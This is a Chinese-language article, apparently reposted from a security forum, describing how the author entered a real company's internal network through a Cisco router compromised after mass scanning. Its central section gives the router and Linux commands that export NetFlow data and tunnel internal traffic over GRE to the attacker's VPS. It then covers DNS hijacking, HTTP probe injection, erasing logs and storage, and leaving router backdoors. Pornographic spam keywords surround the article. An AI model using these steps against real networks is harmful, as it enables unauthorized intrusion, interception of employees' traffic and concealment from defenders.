精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

利用被入侵的路由器邁入內網

安全
去年開始利用路由器對目標內網進行滲透的方式方法開始研究,測試了一陣了。之前有一篇翻譯外國人的文章,講路由器流量劫持的,利用條件苛刻,成效也不大。所以決定寫一篇自己實測的例子。

去年開始利用路由器對目標內網進行滲透的方式方法開始研究,測試了一陣了。之前有一篇翻譯外國人的文章,講路由器流量劫持的,利用條件苛刻,成效也不大。所以決定寫一篇自己實測的例子。

0x01 控制路由器

現在只搞cisco的路由器,但是方法不限于cisco,華為,juniper什么的都可以。

這一步沒有什么好的辦法,我們利用分布式掃描抓到了一些路由器,再加上其他的漏洞,有了一定數量作為測試保證。

選擇一臺 cisco c800系列的小企業路由器(很老了) 

 

圖1 router version

進去之后,先查看日志,登陸認證相關信息。 

 

圖 2 router 登陸等相關信息

有一個登陸限制的acl,被我之前刪掉了,這就找到了telnet的密碼。同時沒有開啟aaa認證,也就不存在什么認證服務器什么的,就只有本地驗證。沒有任何日志服務器的配置,連snmp都沒有配置(本來還想留一個snmp的后門,看來是不行了)。

趕緊添加賬號密碼,加固路由器,修復漏洞。 

 

圖3 添加特權賬戶

0x02 網絡拓撲分析

基本操作完,趕緊保留一份完整的配置(這個不能完整的貼出來)然后分析基本網絡架構。

總述就是這是一個公司的小分部,通過pppoe加nat上網,有一個公網ip地址,有一個10.xx.xx.0/24的內網地址,通過gre的隧道,和主公司相連,擁有更為龐大的內網。

這種網絡形式是最為常見的,通過ISP撥號獲取公網地址,然后內網機器通過nat上網。全公網ip地址的公司網絡極為少見。

網絡拓撲如下: 

 

圖4 網絡拓撲示意圖#p#

0x03 準備進入內網

內網機器通過NAT訪問Google,同時內網受到NAT的保護。我們控制了R1這臺路由器,處于內網出口;還有一臺公網VPS,ubuntu12.04 。R2表示很多臺路由器,沒有控制權限。

由于想要進行內網滲透測試,需要獲取更多的信息。我們另外添加一臺公網VPS(win2008R)在上面架設流量監視服務器,分析內網日常流量和行為。

win2008搭建的是netflow服務器,在R1上配置netflow,來觀測內網流量信息。netflow軟件網上有好多,solarwind最好,支持sqlserver2005,能存儲大量的數據,沒找到破解版。我用的ManageEngine,到處都是破解版。

netflow配置:

ip flow-export so int e 0
ip flow-ex dst 1.1.1.1 8888
ip flow-ex ver 5
……

流量分析比較直觀,公司日常工作流量都是通過GRE Tunnel到達主網絡,日常流量以http和https為主,而且通過流量統計可以看出來,他們的dns絕大多數都是Google public dns,占了所有dns流量的90%以上。 

圖6 目標網絡流量總覽圖 

 

圖7 流量分類示意圖

統計出來的web流量,嘗試去打開這些網頁,我都打不開,都是提示404 Not Found或者就是證書錯誤。這樣看不見到底訪問的是什么網站,Google也都沒有搜索記錄,就只能勉強看一下bing的同站,結果記錄還是特別少。

為了摸清這個內網更為詳細的信息(公司叫什么名字,員工經常登陸什么網站,常用軟件是什么),就只能先劫持一下DNS了。由于網絡環境比較惡略,有個NAT使得網絡復雜太多。所以不選擇使用透明劫持方式,選擇用網關劫持方式。

做一下名詞解釋:

透明劫持方式:自定義名詞,即不修改數據包的源IP地址和目的IP地址,只對數據包的data和checksum進行修改。這樣基本不會讓用戶和服務器引起任何察覺,做到完全透明,同時無法被殺軟防火墻IPS之類的發覺,除了增加一些延遲。

網關劫持方式:顧名思義,就是作為一個網關,對經過我的流量進行路由和NAT,使得流量能夠正常在Internet上傳輸。會產生較大的影響,以Gmail為例,會提示異地登陸等。

關于劫持有一條準側(我總結的):在有防火墻或者NAT的環境中劫持流量,你在哪把數據包接走,必須得把數據包(被劫持的數據包或者該數據包的回包)送回到那里。

這里做一下解釋,在NAT上網的環境中做GRE通道的流量劫持,會很麻煩。出方向數據包通過路徑為先進入GRE Tunnel,然后作為一個GRE 數據包通過NAT,也就是NAT只對GRE數據包生效,并且記錄下狀態,不會對被包含在GRE 中的數據包進行NAT,所以入方向,無法通過NAT。 這樣的解釋適用于防火墻。

因為編程能力有限等考慮,決定使用網關劫持模式。

在R1的連接公網的端口和我的Linux eth0 建立GRE Tunnel

Linux IP 地址:1.1.1.1

路由器公網IP地址:2.2.2.2

R1的配置

en
conf t
int tunnel 1
tunnel so e0(接口名稱,也可以使用接口IP地址,但是會出問題)
tunnel dest 1.1.1.1
ip add 12.1.1.1 255.255.255.252
end

linux Ubuntu 配置: 建立GRE Tunnel

#modprobe ip_gre
#lsmode | grep
#ip tunnel add gre1 mode gre remote 2.2.2.2 local 1.1.1.1 ttl 255
#ip link set gre1 up
#ip addr add 12.1.1.2 peer 12.1.1.1 dev gre1

在Tunnel的兩端都PING一下對端的IP地址,應該都是通的。

然后開啟路由轉發

將 /proc/sys/net/ip_forward 的數值修改為 1 (本次有效,重啟后失效)

修改 /etc/sysctl.conf 文件,讓包轉發在系統啟動時生效

net.ipv4.ip_forward = 1 前面的#號去掉

開啟Iptables 的NAT

#iptables -t nat -A POSTROUTING -s 192.168.1.0/25 -j SNAT —to-source 202.103.224.58

192的地址為需要做NAT的地址,202地址為已有公網IP地址,配置單詞生效,重啟后失效。

保存iptables 的規則 。

#service iptables save

添加內網路由

route add -net 10.0.0.0/8 gre1

通往10.0.0.0這個八位的網絡全部走gre1這個出口,即全部走GRE隧道。

然后利用我們自己開發的軟件獲取DNS數據內容 ,內容不方便貼出。

劫持了幾天dns,看他們上了幾天網之后,對內網有了個更為清楚的認識。進一步對HTTP數據包進行修改,加了個探針。探明之后再準備加入EXP獲取內網權限,結果都是chrome,就放棄了。探針信息不方便貼出。

流量中還有telnet,ssh這類的流量,但是不能劫持,目的地址做了acl的限制,我的Linux不能訪問,直接refuse。#p#

0x04 進入內網

流量不能幫我獲取內網權限,就只能自己進入內網。

強制劫持一個內網沒有人用的合法IP地址,通過連接linux openVPN分配給自己,剩下只要在路由器添加這個地址的主機路由和在Linux上添加到10.xx.xx.xx/8 的默認路由,然后我的WorkStation就獲得了內網訪問權限(沒有像VPN什么的限制,訪問權限等同于路由器權限)。

如何讓自己的WorkStation進入內網就是很隨意的了,方法實在是太多,因為此時這臺Ubuntu已經在內網中。openVPN配置和添加路由配置就不貼出了,網上太多。 

 

圖8 驗證Ubuntu于內網的連通性

這樣的內網滲透是有以下幾個優點:

你所有的流量會被內網流量設備認為是內網流量,流量稍微大一點的內網,你可以隨意下載文件,不用再關心流量過大引起報警。(理論,沒脫過文件)

在路由器上做好隱藏,規避netflow監測,去掉日志,在臨走的時候直接erease所有的存儲器,你的行為在內網不可查。(理論,沒做過)

如果地址劫持的合適,能繞過內網服務器的登陸限制(三層限制)。

時間把握的好,可以制造內網某員工從文件服務器大量下載文件的假象。(理論,沒做過)

缺點

就一個,數據包不加密,這點很煩人,數據包基本全透明。要是路由器外沒有安全設備了或者直接做一個IPSec Tunnel,就等同于沒缺點。

總結,就是擁有極高的隱蔽性,遠高于VPN,馬什么的。連日志服務器都可以不怎么理他。

本文標題為邁入內網,并非內網滲透,不做內網滲透相關研究。

所有的敏感的信息已經修改涂掉。

0x05 后話

其他的一些小討論

關于鏈路延遲,研究比較多,需要多說一點。以我劫持的Google為例,我在Google與內網路徑的附近,并且是靠近Google的一端。

到Google的延遲平均為0.617ms 

 

圖9 Ubuntu 到Google延遲

路由器到Linux的延遲平均為256ms,路由器直接ping Google 平均延遲時180ms 

 

圖10 路由器網絡延遲截圖

Linux處理劫持數據,修改數據包的軟件延遲約為5ms,所以預估劫持之后的延遲應該在260ms左右。

但是,經過劫持之后,到目標的延遲為248,該數值小于256ms+0.6ms+5ms,至于為什么,無法解釋。

總體延遲影響,增加了180ms的三分之一,60ms左右。

之前我們對延遲有過較多的討論:增加了延遲的三分之一,影響會比較明顯,容易被察覺從而引發報警。我個人認為,大家上百度比平時延遲增加了500ms,或是1s,就算是baidu的運維,在檢查完IP地址,看完tracert之后,也就罵罵運營商。更何況一般網絡用戶不會認為是運營商的問題,只會認為是不是自己電腦卡了,可能有人懷疑自己被網絡劫持了么。

關于內網路由器的討論,本文研究的路由器為網絡邊界路由器,至少有一個公網IP地址。當路由器或者三層交換處于內網中,劫持能否使用,答案是可以的。通過建立七層應用層隧道(GRE為三層網絡層隧道),就像我們個人電腦一樣,穿過內網?;蛘咧苯油瑑染W的一臺服務器建立連接,劫持數據(經過驗證,但是公網測試時,對端是一臺公網CISCO路由器2911,沒試過服務器,開發能力有限)。

如果需要穿透內網,需要應用層VPN,例如IPSec VPN,EZ VPN (我測試了這倆,其他的高于三層的VPN都理論可行)等,配置比GRE Tunnel復雜的多,但懂了原理配置還是很簡單的。配置實在是貼不完。IP Sec VPN理論上應該可以向IP Sec VPN 服務器建立連接,我沒成功,還在理論層面研究。EZ VPN ,CISCO專有,肯定不能在WIN或者linux上搭建服務器。

關于駐留,通過路由器擴展內網駐留或者路由器后門駐留,比馬什么的好太多了,除了NSA和fireeye,沒聽說過誰接觸過過路由器后門的。國內絕對是通殺,會配置路由器的都沒幾個人,更別說反查。

關于HTTPS的討論:綠標這個問題確實比較頭疼,我目前嘗試能過的就是嵌套,在綠標中插入紅標,最后用戶看到的還是綠標。

關于流量劫持軟件,網上都說劫持軟件多如牛毛,但是實際上找下來,就沒有一個可以拿來直接用的,尤其是在透明劫持這個模式下,沒發現能直接用的,像什么MITMproxy什么什么的,大家都說好,實際測試一下,也就適合開發人員調試軟件,所以只能自己開發,但是開發能力有限。

希望大家推薦一些,能效率很高的處理大流量(例如BGP劫持)的軟件。

 

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2015-09-15 09:49:52

2014-03-31 09:13:20

2009-12-21 10:32:01

2009-08-10 15:14:34

2010-09-08 14:01:40

2015-06-26 10:58:48

2013-01-31 11:08:13

路由器100G網絡華為

2010-08-25 20:28:58

路由器DHCP

2009-12-08 16:47:17

2013-06-07 17:25:46

路由技術路由器

2010-08-11 14:03:47

2011-08-29 13:04:09

路由器設置路由器連接路由器

2015-09-20 21:21:20

2009-10-10 11:04:21

2010-08-25 10:39:58

路由器故障

2013-11-14 10:06:10

2015-06-08 10:21:46

WiFi路由器

2010-08-13 09:53:21

2010-08-04 10:02:39

2011-08-10 12:22:22

點贊
收藏

51CTO技術棧公眾號

国产精品扒开腿爽爽爽视频| 亚洲第一视频网站| 特色特色大片在线| 亚洲精品久久久久avwww潮水| 136国产福利精品导航网址| 亚洲精品电影网| 在线免费观看视频黄| 在线中文字幕-区二区三区四区| 成人av在线观| 国产精品一区电影| 国产 日韩 欧美 成人| 国产精品三级| 日韩女优av电影| 日韩精品视频久久| 高清全集视频免费在线| 久久这里只有精品首页| 成人午夜在线影院| 婷婷激情五月网| 亚洲精品2区| 亚洲欧美日韩图片| 欧美一级片在线免费观看| 在线天堂新版最新版在线8| 最新中文字幕一区二区三区| 久久久久久久久一区二区| 国产精品久久久久久无人区| 亚洲一区国产一区| 欧美精品手机在线| 国产一区在线观看免费| 中文字幕伦av一区二区邻居| 日韩欧美亚洲一区二区| 亚洲污视频在线观看| 色偷偷偷在线视频播放| 亚洲综合在线免费观看| 亚洲欧美成人一区| 国产在线观看免费网站| 99久久伊人网影院| 高清国产一区| 99久久精品免费看国产交换| 蜜桃免费网站一区二区三区| 日韩av成人在线| 中文字幕亚洲精品在线| 韩国亚洲精品| 欧美黑人一级爽快片淫片高清| 内射一区二区三区| 91青青国产在线观看精品| 亚洲天堂免费视频| 亚洲最大成人网站| 五月国产精品| 亚洲免费精彩视频| 香蕉网在线播放| 偷拍自拍一区| 亚洲男人天堂网| 无码人妻精品一区二区中文| 欧美三级午夜理伦三级在线观看| 欧美va日韩va| 性活交片大全免费看| xvideos.蜜桃一区二区| 精品乱人伦一区二区三区| 国产乱淫av片| 成人性生交大片免费看中文视频| 亚洲成成品网站| 亚洲av永久无码精品| 久久精品亚洲成在人线av网址| 精品人伦一区二区色婷婷| 中文字幕无人区二| 精品福利网址导航| 精品视频偷偷看在线观看| 久久久无码人妻精品一区| 蜜桃一区二区三区| 亚洲欧美综合v| 日本黄色激情视频| 久久国产影院| 欧美麻豆久久久久久中文| 黄色一级视频免费观看| 国产午夜久久| 国产福利成人在线| 一区不卡在线观看| 国产成人在线视频免费播放| 高清日韩一区| 神马久久高清| 国产精品妹子av| 欧美三级午夜理伦三级老人| 黄色在线看片| 91极品美女在线| 亚洲午夜激情影院| 国产精品17p| 亚洲色图欧美制服丝袜另类第一页| 欧美波霸videosex极品| 欧美国产高清| 日韩av免费在线| 国产精品伊人久久| www.av精品| 视频三区二区一区| 欧美6一10sex性hd| 在线视频观看一区| 中文字幕乱码在线人视频| 羞羞答答一区二区| 精品国偷自产在线视频| 日韩高清精品免费观看| 秋霞午夜鲁丝一区二区老狼| www 成人av com| 国产在线观看免费| 亚洲激情欧美激情| 久久精品网站视频| 欧美影院精品| 伊人av综合网| 日韩aaaaaa| 久久精品国产一区二区三区免费看| 国产精品亚洲综合| 欧美精品hd| 岛国av一区二区三区| 国产探花在线观看视频| 国产最新精品| 韩国三级电影久久久久久| 国产精品久久久久久69| 久久这里都是精品| 欧美久久在线观看| 亚洲三级在线| 综合国产在线视频| 天天干在线播放| 高清免费成人av| 综合一区中文字幕| 91九色综合| 亚洲精品日韩丝袜精品| 久久精品一区二区三| 麻豆精品视频在线观看免费| 欧美久久综合性欧美| 免费av不卡在线观看| 91麻豆精品国产综合久久久久久| 欧美性猛交xxxx乱| 国产精品腿扒开做爽爽爽挤奶网站| 97超碰资源| 顶级网黄在线播放| 欧美日韩国产综合久久| 人妻av无码一区二区三区| 国产欧美精品久久| 精品久久精品久久| 3344国产永久在线观看视频| 日韩一区二区三免费高清| 日本 欧美 国产| 久久精品国产精品亚洲红杏| 性欧美精品一区二区三区在线播放 | 精品久久蜜桃| 青草青在线视频| 欧美一级片免费看| www欧美com| 国模一区二区三区白浆| 亚洲最新在线| 四虎精品永久免费| 日韩中文字幕视频在线| 中文字幕视频一区二区| 国产亚洲精品久| 精品少妇无遮挡毛片| 国产中文精品久高清在线不| 国产精品2018| av资源网在线观看| 欧美日韩一级片在线观看| 欧美色图17p| 久久国产综合精品| 欧美xxxx吸乳| jizz18欧美18| 欧美亚洲午夜视频在线观看| 日本福利片高清在线观看| 日韩欧美在线视频观看| 99久久久无码国产精品衣服| 美女脱光内衣内裤视频久久影院| 一区二区三区三区在线| 国产日韩欧美中文在线| 久久久久久国产| 天堂资源中文在线| 欧美日免费三级在线| 美女福利视频在线观看| 成人激情免费网站| 男人亚洲天堂网| 成人久久电影| 2020国产精品久久精品不卡| 九色porny视频在线观看| 亚洲男人的天堂在线播放| 精人妻无码一区二区三区| 中文字幕永久在线不卡| 久久久久无码精品| 亚洲影院免费| 91社在线播放| 欧美大奶一区二区| 国产日韩在线看| 暧暧视频在线免费观看| 国产一区二区三区欧美| 国产后入清纯学生妹| 欧美日韩国产专区| 一本一本久久a久久| 福利一区二区在线| 韩国日本美国免费毛片| 欧美精品国产一区二区| 国产在线精品一区二区三区| 成人免费网站www网站高清| 久久国产精品首页| 黄网站在线观看| 日韩精品一区二| 国产免费www| 亚洲综合一区在线| 亚洲精品天堂网| 91丨九色丨蝌蚪丨老版| 奇米777在线| 久久婷婷av| 国产欧美精品aaaaaa片| 日韩伦理视频| 蜜桃av噜噜一区二区三| 精品一区二区三区四区五区 | 亚洲tv在线| 57pao国产精品一区| 成年人黄视频在线观看| 亚洲午夜精品久久久久久性色| 亚洲精品国产精品乱码不卡| 欧美日韩亚洲丝袜制服| 亚洲天堂视频网站| 亚洲成人777| 日本中文在线视频| 国产欧美视频一区二区| 中文字幕一区二区人妻电影丶| 国内精品在线播放| 中文字幕有码av| 日日摸夜夜添夜夜添精品视频 | 日本妇女毛茸茸| 亚洲国产精品激情在线观看| 亚洲一区二区三区四区五区六区| 国产精品夜夜嗨| 中文字幕色网站| 免费久久99精品国产| 午夜肉伦伦影院| 亚洲成人直播| 久久精品无码中文字幕| 亚洲女同一区| 91社在线播放| 久久久久久美女精品| 一区二区三区欧美成人| 手机亚洲手机国产手机日韩| 日韩精品极品视频在线观看免费| 亚洲盗摄视频| 欧美久久久久久久| 欧美**字幕| 欧美一区国产一区| 蜜臀av免费一区二区三区| 久久影院理伦片| 亚洲裸色大胆大尺寸艺术写真| 国产精品一区二区av| 第四色在线一区二区| 波多野结衣久草一区| 亚洲国产视频二区| 91久久伊人青青碰碰婷婷| 精品国产不卡一区二区| 91久久精品视频| 国产精品亚洲欧美日韩一区在线| 成人免费视频a| 精品视频在线一区| 亚洲自拍欧美另类| 91精品国产自产精品男人的天堂 | 偷拍亚洲精品| 欧美精品一区在线发布| 欧美中文字幕一区二区| 亚洲国产精品视频一区| 国产精品福利在线观看播放| 国产日本欧美在线| 国产精品v亚洲精品v日韩精品 | 日韩av不卡在线播放| 精品国产一区二区三区香蕉沈先生 | 国产精品入口日韩视频大尺度| 成人看片网站| 成人欧美在线视频| www.成人网| 蜜桃在线一区二区三区精品| 欧美日韩激情在线一区二区三区| 亚洲午夜激情| 午夜精品影院| 99re在线视频免费观看| 麻豆国产一区二区| 91丨porny丨九色| 99re视频这里只有精品| 2019男人天堂| 一区二区久久久久久| 国产成人无码精品久在线观看| 色婷婷国产精品综合在线观看| 6—12呦国产精品| 精品国产乱码久久久久久牛牛 | 一区二区三区亚洲视频| 日韩免费电影一区| 国内精品一区视频| 美女性感视频久久久| 亚洲妇女成熟| 成人免费视频a| 欧美偷窥清纯综合图区| 伊人情人网综合| 亚洲精品综合| 在线观看免费不卡av| 成人黄色综合网站| 国产一二三四视频| 亚洲大型综合色站| 在线亚洲欧美日韩| 日韩成人高清在线| 超碰超碰在线| 国产97在线播放| 亚洲一区二区三区免费| 日韩久久在线| 亚洲大片av| caoporm在线视频| 久久蜜臀精品av| 久久久久免费看| 欧美日韩在线综合| 亚洲欧洲综合在线| 欧美肥婆姓交大片| 久久69成人| 欧美一区二区影视| 亚洲高清二区| 九九九久久久久久久| 欧美国产精品专区| 尤物视频在线观看国产| 日韩欧美在线网站| a√资源在线| 欧美做爰性生交视频| 51vv免费精品视频一区二区| 中文字幕欧美日韩一区二区三区| 久久精品30| 国产伦精品一区三区精东| 亚洲少妇30p| 亚洲在线视频播放| 国产亚洲美女久久| 在线视频cao| 久久波多野结衣| 激情自拍一区| 欧美一级片在线免费观看| 亚洲免费观看高清完整版在线观看 | 国产一区二区免费看| 青青草自拍偷拍| 欧美视频在线观看一区二区| 免费一级在线观看| 欧美自拍视频在线| 欧美成人基地| 国内自拍在线观看| 99久久99久久精品免费观看| 国产亚洲精久久久久久无码77777| 在线综合+亚洲+欧美中文字幕| 免费av在线| 91精品免费视频| 伊人情人综合网| 97超碰免费在线观看| 亚洲精品国产视频| 国产女人高潮时对白| 久久久国产一区二区| 国产成人视屏| 欧美少妇一区二区三区| 国产一区二区三区四区五区入口 | 欧美视频13p| 色视频免费在线观看| 日本一区二区不卡| 狠狠色狠狠色综合婷婷tag| 丁香婷婷激情网| 国产精品不卡在线| 午夜久久久久久久久久| 欧美激情视频播放| 狼人精品一区二区三区在线| 91猫先生在线| 国产精品毛片a∨一区二区三区| 91av国产精品| 久久6精品影院| 九九热播视频在线精品6| 免费黄色日本网站| 日本一区二区三区四区在线视频| 中文字幕永久免费视频| 久久久91精品国产一区不卡| 51亚洲精品| 乱妇乱女熟妇熟女网站| 久久久久久**毛片大全| 在线观看免费视频一区| 精品中文字幕乱| 日韩手机在线| 亚洲精品www.| 亚洲一二三区在线观看| 蜜桃成人在线视频| 91免费看片在线| 日韩视频二区| 极品人妻videosss人妻| 欧美一区二区三区喷汁尤物| 成人国产电影在线观看| 日韩欧美视频第二区| 国产精品一区二区免费不卡| 亚洲第一在线播放| 中文字幕亚洲综合| 国产精品流白浆在线观看| 久久婷婷国产91天堂综合精品| 亚洲男帅同性gay1069| 亚洲欧美丝袜中文综合| 国产日韩在线观看av| 日韩视频不卡| 国产一二三四区| 亚洲乱码av中文一区二区| 91成人精品观看| 久久久久久久久久久久久久国产| 亚洲欧美一区二区三区孕妇| 日av在线播放| 肥熟一91porny丨九色丨| 美腿丝袜亚洲综合|